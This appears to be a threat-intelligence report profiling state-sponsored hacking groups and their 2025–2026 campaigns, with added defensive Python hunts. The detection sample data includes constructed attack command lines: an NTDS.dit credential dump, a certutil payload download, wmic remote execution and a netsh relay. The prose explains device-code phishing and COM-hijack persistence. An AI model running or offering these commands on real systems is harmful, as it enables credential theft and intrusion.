In February 2025, Lazarus Group transferred $1.5 billion in cryptocurrency out of the Bybit exchange in a single afternoon. Fourteen months later, North Korean IT workers embedded inside Western tech companies were sanctioned by the U.S. Treasury. Between those two events, state-sponsored threat actors conducted 297 documented supply chain attacks, breached 200+ telecom operators across six continents, deployed at least four new wiper families against Ukrainian infrastructure, and integrated AI-generated content into the majority of their phishing operations.
This is not a trend report. It is an adversary census.
TL;DR
- Russia, China, North Korea, and Iran have each expanded their operational tempo and sophistication significantly in 2025–2026
- Living-off-the-land techniques now account for 79% of all detections; 84% of high-severity attacks use no custom malware
- The mean time from initial access to exfiltration has compressed to 72 minutes — four times faster than 2023
- AI is no longer experimental; all four nation-states operationalized LLMs in attack chains by late 2025
- Supply chain attacks jumped 93% year-over-year (154 in 2024 → 297 in 2025)
- China’s Volt Typhoon and Salt Typhoon represent strategic pre-positioning, not traditional espionage — they are ready to activate
The Geopolitical Context of 2026
Cyber operations have completed their transition from covert deniable activity to normalized foreign policy instrument. Three forces define the current landscape.
Geopolitics as ops tempo driver. Russian Sandworm attacks against Ukrainian energy infrastructure now correlate directly with battlefield calendars. Iranian cyber operations pause during domestic internet blackouts and surge within days of military strikes. North Korean cryptocurrency theft funds a weapons program under active sanctions. The link between kinetic and cyber operations is no longer circumstantial — it is structural.
AI integration across all phases. ENISA data for 2025 indicates 80% of phishing campaigns now contain AI-generated content. APT36 used AI as a polymorphic malware assembly line, producing variants faster than signature-based detection can respond. MuddyWater’s Dindoor backdoor — written in Deno’s JavaScript runtime — shows construction patterns consistent with GenAI-assisted development. This is not about one group experimenting; all four major nation-state blocs operationalized LLMs during 2025.
Speed compression. The 2026 benchmark for adversary breakout time is 72 minutes from initial foothold to active exfiltration, a fourfold reduction from the 2023 baseline. Defenders whose detection pipelines are calibrated for longer dwell times are already behind.
Russia: The Sabotage and Espionage Machine
Russia operates three cyber services with distinct mandates: the SVR (foreign intelligence collection), the GRU (military intelligence and offensive operations), and the FSB (domestic security and counterintelligence, with its own foreign espionage arm). Each maps to its own APT clusters with largely separate missions, a structure that gives the state operational flexibility and fosters inter-agency competition.
Midnight Blizzard / APT29 (SVR)
Attribution: Russia’s Foreign Intelligence Service (SVR), assessed with high confidence by multiple Western intelligence services.
Mandate: Long-duration strategic espionage. APT29 does not blow things up. It reads your mail, attends your meetings, and copies your files — then leaves without a trace.
2025–2026 campaigns:
The group’s most operationally creative campaign in this period targeted European diplomatic personnel with wine-tasting lures. Invitations to exclusive tastings, timed to the social calendars of diplomatic staff, delivered GRAPELOADER, a first-stage loader that establishes persistence and profiles the host before pulling down secondary payloads. The campaign, active through April 2025, stood out for the authenticity of its lure infrastructure: functional event websites with working registration flows, realistic calendar invites, and lookalike sender domains the operators controlled, so SPF and DKIM checks passed and the mail reached inboxes with no authentication warnings.
APT29 also continued to abuse the OAuth 2.0 device authorization grant, the flow Microsoft Entra offers for input-constrained devices such as smart TVs, printers and conference-room hardware. The operator starts the flow, receives a short user code, and social-engineers the target into visiting microsoft.com/devicelogin and entering it, typically framed as joining a Teams meeting or a secure chat. The victim authenticates normally, MFA included, on Microsoft’s genuine login page; the resulting access and refresh tokens are then issued to the attacker’s client. No password is captured and no fake login page is involved, which is why password resets and anti-phishing training do little against it. The tokens work against every Microsoft 365 service the account can reach, and nothing ever touches the victim’s endpoint. The sign-in is recorded in Entra sign-in logs with the device code authentication protocol, so it is detectable, but only if someone is looking for that protocol from users and locations where it has no business appearing.
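As an added example (not from the report), the hunt a defender would run over Entra ID sign-in logs for this technique: the Microsoft Graph `signIn` resource exposes an `authenticationProtocol` field whose value `deviceCode` marks these sign-ins. The records, the allow-list and the `example.gov` tenant below are constructed; whether the logged IP belongs to the redeeming client or to the victim varies, so the IP test is a secondary heuristic behind the protocol check.

```python
"""Hunt for OAuth device-code sign-ins in Entra ID sign-in logs.

Added example, not from the original report. It assumes sign-in records in the
shape Microsoft Graph returns for /auditLogs/signIns (fields such as
authenticationProtocol, ipAddress, location, appDisplayName, userPrincipalName);
the records below are constructed, not real telemetry.
"""
from collections import defaultdict

# Constructed sample: four sign-ins for two users. Field names follow the Graph
# signIn resource; the values are invented for the example.
SAMPLE_SIGNINS = [
    {"id": "1", "userPrincipalName": "ambassador@example.gov", "authenticationProtocol": "oAuth2",
     "ipAddress": "203.0.113.10", "location": {"countryOrRegion": "BE"},
     "appDisplayName": "Microsoft Teams", "createdDateTime": "2025-03-03T08:02:11Z"},
    {"id": "2", "userPrincipalName": "ambassador@example.gov", "authenticationProtocol": "deviceCode",
     "ipAddress": "198.51.100.7", "location": {"countryOrRegion": "NL"},
     "appDisplayName": "Microsoft Authentication Broker", "createdDateTime": "2025-03-03T09:15:40Z"},
    {"id": "3", "userPrincipalName": "ops@example.gov", "authenticationProtocol": "deviceCode",
     "ipAddress": "203.0.113.44", "location": {"countryOrRegion": "BE"},
     "appDisplayName": "Microsoft Teams Rooms", "createdDateTime": "2025-03-03T09:20:00Z"},
    {"id": "4", "userPrincipalName": "ops@example.gov", "authenticationProtocol": "oAuth2",
     "ipAddress": "203.0.113.44", "location": {"countryOrRegion": "BE"},
     "appDisplayName": "Outlook", "createdDateTime": "2025-03-03T09:25:00Z"},
]

# Accounts that legitimately use the device code grant (conference-room devices,
# kiosks). Hypothetical allow-list for the example.
DEVICE_CODE_ALLOWLIST = {"ops@example.gov"}


def baseline_ips(signins):
    """Per-user set of IPs seen on ordinary (non-device-code) sign-ins: the known footprint."""
    seen = defaultdict(set)
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            seen[s["userPrincipalName"]].add(s.get("ipAddress"))
    return seen


def find_suspicious_device_code(signins, allowlist=DEVICE_CODE_ALLOWLIST):
    """Return device-code sign-ins worth triage.

    Flagged when the user is not on the allow-list, or when the source IP never
    appears in that user's ordinary sign-ins. In the phishing case the victim completes
    MFA on their own machine while the token is redeemed by the attacker's client, so a
    footprint that does not match the user's normal one is the tell. Which IP the log
    records can vary; treat the IP rule as a heuristic and the protocol rule as primary.
    """
    known = baseline_ips(signins)
    hits = []
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            continue
        upn = s["userPrincipalName"]
        reasons = []
        if upn not in allowlist:
            reasons.append("user not expected to use device code flow")
        if s.get("ipAddress") not in known.get(upn, set()):
            reasons.append("device-code sign-in from IP never seen in user's normal sign-ins")
        if reasons:
            hits.append({"id": s["id"], "user": upn, "ip": s.get("ipAddress"),
                         "app": s.get("appDisplayName"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in find_suspicious_device_code(SAMPLE_SIGNINS):
        print(h)
```

Where the flow is not needed at all, Conditional Access can block the device code grant outright through its authentication-flows condition; the hunt above is for the residue in tenants that still have to permit it for some accounts.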
Signature TTPs:
- Supply chain compromise via trusted software update mechanisms (SolarWinds precedent still active in operational playbook)
- Living-off-the-land using legitimate cloud services (Dropbox, OneDrive, Google Drive) as C2 channels
- GRAPELOADER as initial access → custom implants for long-term persistence
- Device code phishing: tokens obtained while the victim completes MFA legitimately, no password captured
Fancy Bear / APT28 (GRU Unit 26165)
Attribution: GRU 85th Main Special Service Centre (GTsSS), Unit 26165. Indicted by the U.S. DOJ in 2018; linked to multiple Western intelligence assessments since 2014.
Mandate: Aggressive intelligence collection in support of military operations, plus information operations and election interference.
2025–2026 campaigns:
APT28 released PRISMEX, an implant that combines steganographic payload delivery with COM hijacking for persistence. Command-and-control instructions travel inside image files hosted on legitimate image-sharing services, so the download looks like ordinary web browsing. Persistence relies on the way Windows resolves COM classes: a per-user registration under HKCU\Software\Classes\CLSID takes precedence over the machine-wide one, so pointing a common CLSID’s InprocServer32 at the attacker’s DLL gets it loaded by a trusted process the next time that class is instantiated, with no entry in Run keys, services or scheduled tasks. Tools that only audit those well-known autostart locations miss it.
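The check a practitioner wants after reading about COM hijacking is a diff of per-user COM registrations against the machine hive. The following is an added example, not PRISMEX code and not from the report: it applies that rule to a constructed, simplified CLSID-to-InprocServer32 dump for both hives (on a live host the input would come from `reg export` of `HKCU\Software\Classes\CLSID` and `HKLM\Software\Classes\CLSID`). The CLSIDs, paths and trusted-directory list are invented for the example.

```python
r"""Find per-user COM registrations that shadow machine-wide ones (COM hijacking).

Added example, not from the original report and not PRISMEX code. COM hijacking
works because HKCU\Software\Classes is merged over HKLM\Software\Classes when a
process resolves a CLSID, so a user-writable InprocServer32 entry is loaded instead
of the real one, without touching Run keys or Services. The input is a constructed,
simplified dump of CLSID -> InprocServer32 paths for both hives; the CLSIDs and
paths are invented for the example.
"""
import ntpath

# Directories a standard user cannot write to; a COM server anywhere else deserves a look.
TRUSTED_DIR_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Constructed sample: machine hive (HKLM) and one user's hive (HKCU).
HKLM_CLSIDS = {
    "{00000000-aaaa-bbbb-cccc-111111111111}": r"C:\Windows\System32\shell32.dll",
    "{00000000-aaaa-bbbb-cccc-222222222222}": r"C:\Windows\System32\wbem\fastprox.dll",
}
HKCU_CLSIDS = {
    # Shadows an HKLM CLSID and points into a user-writable directory: classic hijack.
    "{00000000-aaaa-bbbb-cccc-111111111111}": r"C:\Users\victim\AppData\Local\Temp\prism.dll",
    # No HKLM counterpart, but a per-user server under AppData is still worth review.
    "{00000000-aaaa-bbbb-cccc-333333333333}": r"C:\Users\victim\AppData\Roaming\Viewer\img.dll",
    # Legitimate per-user registration for a normally installed component.
    "{00000000-aaaa-bbbb-cccc-444444444444}": r"C:\Program Files\Vendor\component.dll",
}


def _norm(path):
    # Registry values may be quoted or carry stray whitespace; normalise before comparing.
    return ntpath.normpath(path.strip().strip('"')).lower()


def is_trusted_location(path):
    return _norm(path).startswith(TRUSTED_DIR_PREFIXES)


def find_com_hijacks(hklm, hkcu):
    """Return findings for HKCU CLSIDs that shadow HKLM or load from untrusted paths.

    severity 'high':   shadows a machine-wide CLSID with a different server path.
    severity 'medium': no HKLM counterpart, but the server lives in a user-writable directory.
    """
    findings = []
    for clsid, user_server in hkcu.items():
        machine_server = hklm.get(clsid)
        if machine_server is not None and _norm(machine_server) != _norm(user_server):
            findings.append({"clsid": clsid, "severity": "high",
                             "hkcu": user_server, "hklm": machine_server})
        elif machine_server is None and not is_trusted_location(user_server):
            findings.append({"clsid": clsid, "severity": "medium",
                             "hkcu": user_server, "hklm": None})
    # 'high' sorts before 'medium' alphabetically, which is the triage order we want.
    return sorted(findings, key=lambda f: f["severity"])


if __name__ == "__main__":
    for f in find_com_hijacks(HKLM_CLSIDS, HKCU_CLSIDS):
        print(f["severity"], f["clsid"], f["hkcu"], "shadows", f["hklm"])
```

Run it per user profile, not once per host: each HKCU hive is a separate attack surface, and the CLSIDs worth watching are the ones that explorer.exe and other always-running trusted processes instantiate at logon.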
The group’s zero-day portfolio remained active. CVE-2026-21509, a Microsoft Office memory corruption vulnerability, was exploited via weaponized DOC files targeting Ukrainian government ministries. The vulnerability allowed remote code execution through preview pane activation alone — no user interaction beyond opening a folder view.
A sustained router and DNS exploitation campaign, active since August 2025, affected over 200 organizations across NATO member states. APT28 targeted SOHO and enterprise routers with known but unpatched CVEs, converting them into covert relay nodes that forward traffic while appearing as legitimate network infrastructure. The campaign specifically targeted organizations adjacent to Ukrainian logistics and military supply chains.
Signal’s linked-devices feature emerged as an initial access vector. Linking is legitimate functionality: the account owner scans a QR code from their primary device, and the newly linked device then receives every subsequent message. APT28 operators sent Ukrainian military personnel and government staff QR codes dressed up as group invites or security notices; scanning one enrolled an attacker-controlled device on the victim’s account. No password or verification code is stolen, so no authentication alert fires, and the silent mirroring persists until the victim opens Signal’s Linked Devices settings and removes the entry they do not recognise.
Signature TTPs:
- PRISMEX: steganographic C2 + COM hijacking persistence
- Zero-day exploitation of Microsoft Office (CVE-2026-21509)
- SOHO/enterprise router compromise for covert relay infrastructure
- Signal linked-device abuse for communication interception
- Spear-phishing with very high fidelity lures referencing real internal context
Primary targeting: NATO member state governments, military logistics, Ukrainian government ministries, think tanks, media organizations
Sandworm / APT44 (GRU Unit 74455)
Attribution: GRU Unit 74455, also known as the Main Centre for Special Technologies (GTsST). Responsible for NotPetya (2017), the 2015–2016 Ukrainian power grid attacks, and the 2018 Winter Olympics attack (Olympic Destroyer).
Mandate: Destructive operations. Sandworm is not an espionage group that sometimes breaks things. It is a sabotage unit that occasionally collects intelligence.
2025–2026 campaigns:
Sandworm conducted over ten documented destructive incidents against Ukrainian infrastructure in 2025 alone. The group’s wiper arsenal expanded significantly: AcidPour, Zerolot, and Sting each targeted different infrastructure categories — storage arrays, SCADA systems, and communications respectively.
The most geopolitically significant incident was the DynoWiper deployment against Polish energy infrastructure on December 29, 2025. DynoWiper targeted industrial control systems at a Polish energy distribution facility, overwriting firmware on programmable logic controllers (PLCs) and destroying the master boot record of connected workstations. The attack coincided with increased Russian pressure on NATO’s eastern flank. Poland’s CERT confirmed partial disruption to distribution switching operations; the event was the first confirmed Sandworm-attributed destructive attack on a NATO member state’s critical infrastructure in the current conflict cycle.
DynoWiper’s technical design reflects evolution in Sandworm’s approach. Unlike earlier wipers that targeted Windows filesystems, DynoWiper incorporates ICS-aware components that identify and corrupt specific OPC-UA process namespaces — a level of operational technology specificity that requires either deep intelligence on the target environment or extensive reconnaissance preceding the deployment.
Signature TTPs:
- Custom wiper deployment against ICS/OT environments
- Pre-positioned access maintained for months before destructive phase
- Coordination with kinetic operations on battlefield timelines
- VPN appliance exploitation for initial access
- Living-off-the-land in IT environment → lateral movement to OT network
Primary targeting: Ukrainian critical infrastructure (energy, water, communications, transport); NATO-adjacent logistics and energy; Polish infrastructure (December 2025)
Turla / Snake (FSB Center 16)
Attribution: Russia’s Federal Security Service (FSB), Center 16. Snake rootkit attributed by U.S. DOJ and CISA to Turla in May 2023.
Mandate: Strategic intelligence collection against high-value government and diplomatic targets; counter-espionage tradecraft.
2025–2026 activity:
Turla continued operating Kazuar v2, an updated version of its multi-stage .NET backdoor. Kazuar v2 incorporates enhanced anti-analysis features including timing-based sandbox detection (it sleeps for randomized intervals that exceed typical sandbox execution windows) and process injection techniques that target trusted Windows services.
A notable operational development was documented collaboration between Turla and Gamaredon (another FSB-linked group with a broader, less discriminate targeting profile). Gamaredon provides initial access through commodity phishing at scale; Turla follows behind with Kazuar implants against the specific high-value targets Gamaredon’s access reveals. This represents a modular operation where a less sophisticated group handles noisy initial access and a more disciplined group handles exploitation of valuable targets.
Turla continued exploiting VPN appliances for initial access, and expanded operations into Pakistani government and military infrastructure — an unusual geographic pivot that likely reflects FSB interest in Pakistani intelligence services’ activities in Central Asia.
Signature TTPs:
- Kazuar v2: multi-stage .NET backdoor with anti-analysis evasion
- Gamaredon collaboration for initial access at scale
- VPN appliance exploitation
- Satellite-based C2 infrastructure (legacy, but still observed)
- Hijacking legitimate software update mechanisms
China: Persistence and Pre-Positioning
China’s cyber program is the largest by volume of operations and the most strategically disciplined. The Ministry of State Security (MSS) oversees most APT activity through a contract model — commercial security companies execute operations on behalf of the state, providing a layer of deniability and access to a much larger talent pool than a purely military model would allow. Four clusters dominate current activity.
Wicked Panda / APT41 (MSS)
Attribution: Ministry of State Security, assessed with high confidence. Five members indicted by U.S. DOJ in September 2020.
Mandate: Dual-purpose — espionage for the state combined with financially motivated cybercrime for personal profit. APT41 is one of the few groups where the same individuals conduct intelligence operations and ransomware/data theft operations for personal enrichment.
2025–2026 campaigns:
APT41 recorded a 113% surge in operations in Q1 2025, the largest single-quarter increase in documented activity for any nation-state actor. The expansion correlated with increased U.S.-China trade tensions and targeted U.S. trade policy officials, academic economists, and think tanks with positions on tariff and trade policy.
The group’s most technically innovative new capability was using Google Calendar as a command-and-control channel. The TOUGHPROGRESS implant polls an attacker-owned Google Calendar, reads encoded commands out of event descriptions, executes them, and writes the encoded results back into the calendar as new events. The traffic is HTTPS to Google’s own API endpoints, indistinguishable by destination or certificate from legitimate Workspace use; there is no attacker-hosted infrastructure to block or sinkhole, and the operator only has to read events. What remains detectable is behaviour: which process is talking to the Calendar API, how regularly, and whether the account involved has any business on that host.
APT41 exploited CVE-2025-4427 and CVE-2025-4428 in Ivanti Endpoint Manager Mobile (EPMM), chaining an authentication bypass with a remote code execution vulnerability to achieve unauthenticated RCE against internet-facing MDM servers. The exploit chain was weaponized within hours of public PoC availability and used against U.S. government contractors and municipal government networks.
Signature TTPs:
- TOUGHPROGRESS: Google Calendar as C2 channel
- CVE chaining for unauthenticated RCE (Ivanti EPMM CVE-2025-4427/4428)
- Simultaneous espionage + financial crime operations
- Rapid exploitation of newly disclosed vulnerabilities (often within 24 hours)
- Supply chain compromise of software update mechanisms
Primary targeting: U.S. trade and economic policy sector, government contractors, gaming industry (financial motivation), healthcare (IP theft)
Volt Typhoon (MSS-linked)
Attribution: MSS-linked, assessed with high confidence by U.S. CISA, NSA, FBI joint advisories.
Mandate: Pre-positioning in critical infrastructure for potential activation during armed conflict. Volt Typhoon is not a collection operation; what it takes (domain credentials, network maps) is what it needs to keep and extend access that can be used to cause disruption at a strategically chosen moment.
2025–2026 activity:
Volt Typhoon maintained previously established access in U.S. electric utilities, oil and gas networks, water treatment facilities, and transportation logistics — with some implants persisting for up to five years undetected. The group’s defining operational characteristic is absolute avoidance of custom malware. Every technique observed uses living-off-the-land binaries: PowerShell, WMI, certutil, netsh, ntdsutil.
The absence of custom tools is not laziness — it is deliberate. In environments where EDR products flag unknown binaries, Volt Typhoon simply never drops unknown binaries. Their entire operational chain runs through signed Windows components, making behavioral detection dependent entirely on understanding what normal administrative activity looks like in a specific environment — and most organizations do not have that baseline established.
Network pivoting occurs through compromised SOHO routers and end-of-life network appliances that sit outside the monitoring perimeter. Volt Typhoon’s relay infrastructure is built from real devices in real ISP networks, giving them source IPs that appear as legitimate U.S. traffic.
The strategic logic is explicit in intelligence assessments: this pre-positioning is designed to give China the ability to disrupt U.S. military logistics, communications, and civilian infrastructure in the event of military conflict over Taiwan or in the broader Indo-Pacific theater.
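Because every Volt Typhoon step is a signed Windows binary, detection comes down to command lines and parent processes rather than file hashes. The following is an added example, not from the report or from any vendor rule set: a small set of regex rules over process-creation events (Sysmon Event ID 1 or Security 4688 style) covering the tradecraft the public CISA/NSA/FBI advisories describe, namely ntdsutil snapshots of NTDS.dit, netsh portproxy relays, wmic remote process creation and certutil downloads. The events, hostnames and IPs are constructed; the patterns are illustrative, not exhaustive.

```python
"""Flag living-off-the-land command lines of the kind attributed to Volt Typhoon.

Added example, not from the original report or any vendor rule set. Runs regex
rules over process-creation events (parent image, image, command line). The events
below are constructed; the patterns encode the publicly described tradecraft
(ntdsutil NTDS.dit snapshot, netsh portproxy pivots, wmic remote process creation,
certutil download/decode, shadow copy creation) and are not exhaustive.
"""
import re

RULES = [
    # ntdsutil "activate instance ntds" + "ifm" writes a copy of NTDS.dit for offline cracking.
    ("ntdsutil_ntds_dump",
     re.compile(r"ntdsutil(\.exe)?.*\b(ac(tivate)?\s+i(nstance)?\s+ntds|ifm)\b", re.I)),
    # netsh portproxy turns a host into a TCP relay; rarely legitimate on servers.
    ("netsh_portproxy",
     re.compile(r"netsh(\.exe)?\s+interface\s+portproxy\s+add", re.I)),
    # wmic /node:... process call create = remote execution without dropping PsExec.
    ("wmic_remote_exec",
     re.compile(r"wmic(\.exe)?\s+/node:.*process\s+call\s+create", re.I)),
    # certutil as a downloader or base64 decoder.
    ("certutil_download_or_decode",
     re.compile(r"certutil(\.exe)?\s+.*(-urlcache|-decode)\b", re.I)),
    # Volume shadow copy creation feeding a credential dump.
    ("vssadmin_shadow",
     re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I)),
]

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "dc01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": 'ntdsutil.exe "ac i ntds" ifm "create full C:\\Windows\\Temp\\pro" q q'},
    {"host": "fs02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.5 connectport=443"},
    {"host": "ws17", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh wlan show profiles"},
    {"host": "ws17", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.9/a.txt C:\\Users\\Public\\a.txt"},
    {"host": "app03", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\wmic.exe",
     "cmdline": 'wmic /node:10.0.0.12 process call create "cmd /c whoami > c:\\w.txt"'},
]


def match_rules(event, rules=RULES):
    """Return the names of all rules whose pattern matches the event's command line."""
    return [name for name, pat in rules if pat.search(event.get("cmdline", ""))]


def triage(events, rules=RULES):
    """Attach matched rule names to each event and return only the events that matched.

    Baselining caveat: administrators use these binaries too, so a hit is a lead to
    compare against the host's normal admin activity, not a verdict.
    """
    hits = []
    for ev in events:
        names = match_rules(ev, rules)
        if names:
            hits.append({**ev, "rules": names})
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_EVENTS):
        print(h["host"], h["rules"], h["cmdline"])
```

The rules are deliberately narrow on arguments rather than on binary names: `netsh wlan show profiles` from explorer.exe is ordinary, `netsh interface portproxy add` on a file server is not, and that distinction is exactly the per-environment baseline the preceding paragraph says most organisations lack.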
Signature TTPs:
- 100% LOTL: PowerShell, WMI, certutil, netsh, ntdsutil — no custom malware
- SOHO router compromise for relay infrastructure
- Multi-year persistence with minimal hands-on activity (positioning, not exploiting)
- KV-Botnet for routing traffic through compromised SOHO devices
- Focus on OT network access via IT network pivoting
Primary targeting: U.S. electric grid, oil/gas, water treatment, transportation logistics, military-adjacent communications
Salt Typhoon (MSS)
Attribution: MSS. Linked to infrastructure and tradecraft overlapping with other MSS-affiliated clusters.
Mandate: Strategic signals intelligence collection — the cyber equivalent of a wiretap program at national scale.
2025–2026 campaigns:
Salt Typhoon’s operational scope is without parallel in documented cyber espionage. The group breached over 200 telecom operators and ISPs across six continents, with confirmed victims including AT&T, Verizon, T-Mobile, Lumen Technologies, and Viasat. The initial wave of disclosures in late 2024 expanded through 2025 as additional carriers worldwide identified the same implants.
The capability Salt Typhoon established was not simply data theft — it was real-time lawful intercept infrastructure compromise. U.S. carriers are legally required to maintain CALEA (Communications Assistance for Law Enforcement Act) compliant intercept systems that allow court-ordered wiretapping. Salt Typhoon gained access to these systems, effectively giving the MSS the ability to activate wiretaps on any subscriber of affected carriers — the same capability that is supposed to require a federal court order.
Call records, location data, and in some cases real-time audio were accessible for targeted subscribers. Intelligence assessments indicate the group specifically queried records associated with U.S. government personnel, political figures, and intelligence community staff.
In May 2025, the operation expanded to satellite network operators, extending the reach into maritime, aviation, and remote-area communications infrastructure not covered by terrestrial carrier compromise.
Signature TTPs:
- Exploitation of network appliance vulnerabilities (Cisco, Juniper, Fortinet) for carrier-grade infrastructure access
- CALEA intercept system compromise for lawful intercept capability abuse
- Long-dwell persistence in carrier core infrastructure
- Targeted subscriber record queries against specific individuals
- Satellite operator network compromise (May 2025)
Primary targeting: Global telecommunications carriers, ISPs, satellite operators; specific subscriber targets within those networks including government personnel and intelligence community
Leviathan / APT40 (Hainan MSS)
Attribution: Hainan State Security Department (provincial MSS office). Four members indicted by U.S. DOJ in July 2021.
Mandate: Maritime and naval intelligence collection; regional espionage in the Indo-Pacific.
2025–2026 activity:
APT40’s defining operational characteristic is speed. The group maintains a dedicated vulnerability research capability that consistently produces functional exploits within hours of public CVE disclosure — sometimes before vendor patches are available. CISA and Australian Signals Directorate attributed this pattern formally in a 2024 joint advisory that documented APT40 exploiting proof-of-concept code from public repositories within a single business day.
The group’s relay infrastructure relies heavily on compromised SOHO devices — consumer routers, NAS devices, and small business network equipment at the end of their support lifecycle. These devices serve as the first hop in APT40’s operational infrastructure, providing source IP addresses that appear as residential or small-business traffic rather than VPS or data center addresses. The devices are compromised through known CVEs; no zero-days are required because most SOHO devices are never patched.
Signature TTPs:
- Rapid weaponization of newly disclosed CVEs (hours, not days)
- SOHO device compromise as redirector infrastructure
- Web shell deployment as persistent access mechanism
- ProxyLogon/similar Exchange server exploitation
- Maritime and naval research institution targeting
Primary targeting: Indo-Pacific maritime sector, naval research, defense industrial base, academic institutions with Indo-Pacific research programs
North Korea: Crypto Heists and IT Worker Fraud
North Korea’s cyber program is unique in one dimension: it is explicitly self-funding. The Reconnaissance General Bureau (RGB) Cyber Operations Unit is tasked with generating hard currency to fund the weapons program and evade international sanctions. This gives the program a financial mandate absent in other nation-state programs, producing operational behavior that blurs the line between state espionage and organized crime.
Lazarus Group / APT38 (RGB)
Attribution: RGB (Reconnaissance General Bureau), Bureau 121. Extensively attributed by U.S. and allied intelligence services; members sanctioned by OFAC.
Mandate: Financial crime at scale to fund the North Korean state; strategic cyber espionage; selective ransomware operations.
2025–2026 campaigns:
The Bybit heist on February 21, 2025, was the largest cryptocurrency theft in history by a significant margin. Lazarus Group compromised Safe{Wallet} — a multisignature wallet management platform — to inject malicious JavaScript into the signing interface used by Bybit’s treasury team. When Bybit employees confirmed a routine transfer, they were actually signing an attacker-controlled transaction. $1.5 billion in ETH exited the exchange in a single operation and was immediately distributed across a laundering network spanning hundreds of intermediate wallets, cross-chain bridges, and peer-to-peer conversion platforms. The full laundering process took weeks; the theft took minutes.
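The defensive lesson of a tampered signing interface is that the screen is not the transaction: a signer has to decode the raw payload independently (on the hardware wallet display, or with an offline decoder) and compare it with what the UI claims. The following is an added example, not from the report, Bybit or Safe. It decodes the standard Safe `execTransaction` ABI layout without any third-party library and checks the recipient, value and operation type against the signer’s stated intent. The addresses, amounts and calldata are constructed for the example; the selector `0x6a761202` is the one the Safe contracts use for `execTransaction`, and the `operation` semantics (0 = call, 1 = delegatecall) are the Safe contract’s own, not something the report describes.

```python
"""Independently decode what a multisig signer is about to approve.

Added example, not from the original report, Bybit or Safe. A compromised signing
front-end can show one transfer while handing the wallet another, so the signer's
check is: decode the raw calldata yourself and compare it with the displayed intent.
Decodes the Safe execTransaction ABI layout (to, value, data, operation, ...) with no
third-party library. Addresses, amounts and calldata below are constructed.
"""

SELECTOR = bytes.fromhex("6a761202")   # execTransaction(address,uint256,bytes,uint8,...)
WORD = 32
# Safe "operation" values: 0 = CALL, 1 = DELEGATECALL. A delegatecall runs foreign code in
# the Safe's own storage context; a routine treasury transfer never needs it.
OP_CALL, OP_DELEGATECALL = 0, 1


def _word(n):
    return n.to_bytes(WORD, "big")


def _addr(hexaddr):
    return bytes.fromhex(hexaddr[2:]).rjust(WORD, b"\x00")


def _bytes_arg(b):
    # ABI dynamic bytes: length word followed by the data padded to a 32-byte boundary.
    return _word(len(b)) + b + b"\x00" * ((-len(b)) % WORD)


def encode_exec_transaction(to, value, data, operation, signatures=b""):
    """Build execTransaction calldata (gas fields zeroed; enough for this example)."""
    data_off = 10 * WORD                       # head is 10 static slots
    sig_off = data_off + len(_bytes_arg(data))
    zero_addr = "0x" + "00" * 20
    head = (_addr(to) + _word(value) + _word(data_off) + _word(operation)
            + _word(0) + _word(0) + _word(0)                 # safeTxGas, baseGas, gasPrice
            + _addr(zero_addr) + _addr(zero_addr)            # gasToken, refundReceiver
            + _word(sig_off))
    return SELECTOR + head + _bytes_arg(data) + _bytes_arg(signatures)


def decode_exec_transaction(calldata):
    """Return the fields a signer must verify: to, value (wei), operation, inner data."""
    if calldata[:4] != SELECTOR:
        raise ValueError("not an execTransaction call: selector %s" % calldata[:4].hex())
    body = calldata[4:]

    def word(i):
        return int.from_bytes(body[i * WORD:(i + 1) * WORD], "big")

    data_off = word(2)
    data_len = int.from_bytes(body[data_off:data_off + WORD], "big")
    data = body[data_off + WORD:data_off + WORD + data_len]
    return {"to": "0x" + body[12:32].hex(), "value": word(1), "operation": word(3), "data": data}


def check_against_intent(calldata, intent):
    """Compare decoded calldata with the transfer the UI claims; return a list of mismatches.

    `intent` is what the signer believes they are approving: {"to", "value", "operation"}.
    An empty list means the raw payload matches the displayed transfer.
    """
    got = decode_exec_transaction(calldata)
    problems = []
    for field in ("to", "value", "operation"):
        if str(got[field]).lower() != str(intent[field]).lower():
            problems.append(f"{field}: UI shows {intent[field]!r}, calldata has {got[field]!r}")
    if got["operation"] == OP_DELEGATECALL:
        problems.append("operation is DELEGATECALL: this changes the Safe itself, not a transfer")
    return problems


# Constructed scenario: the UI displays a 10 ETH transfer to the hot wallet...
UI_INTENT = {"to": "0x" + "11" * 20, "value": 10 * 10**18, "operation": OP_CALL}
HONEST_CALLDATA = encode_exec_transaction(UI_INTENT["to"], UI_INTENT["value"], b"", OP_CALL)
# ...while a tampered front-end hands the wallet a delegatecall into an unknown contract.
TAMPERED_CALLDATA = encode_exec_transaction("0x" + "ee" * 20, 0, bytes.fromhex("deadbeef"),
                                            OP_DELEGATECALL)

if __name__ == "__main__":
    print("honest  :", check_against_intent(HONEST_CALLDATA, UI_INTENT))
    print("tampered:", check_against_intent(TAMPERED_CALLDATA, UI_INTENT))
```

The point of the encoder in the block is only to produce realistic input offline; in practice the calldata comes from the wallet’s signing request, and the decode runs on a machine that did not load the front-end’s JavaScript.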
The group’s total cryptocurrency theft for 2025 was $2.02 billion — a 51% year-over-year increase from 2024’s $1.34 billion figure. This represents a dedicated state revenue stream that has consistently delivered more than North Korea earns from all legitimate exports combined.
In April 2026, Lazarus launched the “Mach-O Man” macOS campaign — a $500 million operation targeting cryptocurrency exchange employees and DeFi protocol developers through macOS-specific malware distributed via trojanized developer tools and fake job offer packages. The campaign exploited the assumption that macOS environments are less monitored than Windows, a gap that persists in most security operations centers.
